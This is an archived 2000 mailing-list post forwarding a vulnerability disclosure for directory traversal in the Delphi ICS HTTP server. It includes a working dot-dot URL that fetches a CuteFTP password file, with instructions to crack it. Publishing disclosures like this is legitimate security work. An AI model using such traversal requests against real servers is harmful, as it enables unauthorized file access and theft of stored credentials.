Vulnerability Development mailing list archives

Fwd: [Newssubmission: Security vulnerability in the ICS HTTPServer component]

From: webmaster () TLSECURITY NET (TLsecurity.net)
Date: Sun, 14 May 2000 14:37:55 EDT


Int_13h
http://www.TLSecurity.net

I thought I forward this over to the List :


http://www.TLSecurity.net


<STRONG>attached mail follows:</STRONG><HR NOSHADE><P>
Hi,

There's a security vulnerability in the Delphi Internet Component Suite's HTTP server. ( 
http://www.rtfm.be/fpiette/indexuk.htm)
These components are widly spread. The vender has been notified of the flaw.

Vulnerability description:

The vulnerability let's a person download _any_ file on the HTTPServer's computer using a simple exploit that can be 
used directly from any internet browser.

Exploit:

Name: Good old dot-dot exploit...

 - Set the HTTP root to 'c:\httproot' and launch the server
 - Start your browser and type
  http://server/../Program%20Files/CuteFTP/smdata.dat
Download the file and crack it
You now have all passwords stored in the victims CuteFTP client.

Note: CuteFTP is just a sample, it could be any program that stores passwords.

Darkstar
dark_star () altavista net
http://browse.to/Darkstar

Current thread:

Re: QPOP2.5* exploit ??, (continued)
- - - Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
    - Re: QPOP2.5* exploit ?? Dimitry Andric (May 14)
    - Re: QPOP2.5* exploit ?? Martin Ixter (May 14)
    - TROJAN WARNING: Re: QPOP2.5* exploit ?? Nic Bellamy (May 14)
    - Re: QPOP2.5* exploit ?? phi-vulndev () EXORSUS NET (May 14)
    - Bubble Boy Virus Spreading Mechanism Andrew Leong (May 15)
    - Re: QPOP2.5* exploit ?? Lluis Mora (May 15)
    - Bugtraq Stats for the last 3 years available now. Alfred Huger (May 15)
    - xsoldier mandrake exploit. egid=games with the right shellcode Larry C$ (May 15)
    - Re: QPOP2.5* exploit ?? rpc (May 14)
    - Fwd: [Newssubmission: Security vulnerability in the ICS HTTPServer component] TLsecurity.net (May 14)
    - Re: regarding phrack49's stack smashing tutorial Pavel Kankovsky (May 14)
    - Re: regarding phrack49's stack smashing tutorial Darshan Patil (May 14)
  - Re: WSCRIPT.EXE , CSCRIPT.EXE replacement for *.vbs Richard Rager (May 13)
  - is: tcp/ip vuln, not?... was: WSCRIPT.EXE , CSCRIPT.EXE replacement for *.vbs Bluefish (May 13)
    - Re: is: tcp/ip vuln, not?... was: WSCRIPT.EXE ,CSCRIPT.EXE replacement for *.vbs Crispin Cowan (May 15)
    - Re: is: tcp/ip vuln, not?... was: WSCRIPT.EXE ,CSCRIPT.EXE replacement for *.vbs Jason Legate (May 17)
  - Re: WSCRIPT.EXE , CSCRIPT.EXE replacement for *.vbs Bluefish (May 13)
- Re: WSCRIPT.EXE , CSCRIPT.EXE replacement for *.vbs Maxime Rousseau (May 12)
  - Re: WSCRIPT.EXE , CSCRIPT.EXE replacement for *.vbs Richard Rager (May 13)
- Re: WSCRIPT.EXE , CSCRIPT.EXE replacement for *.vbs Daniel P. Zepeda (May 14)

(Thread continues...)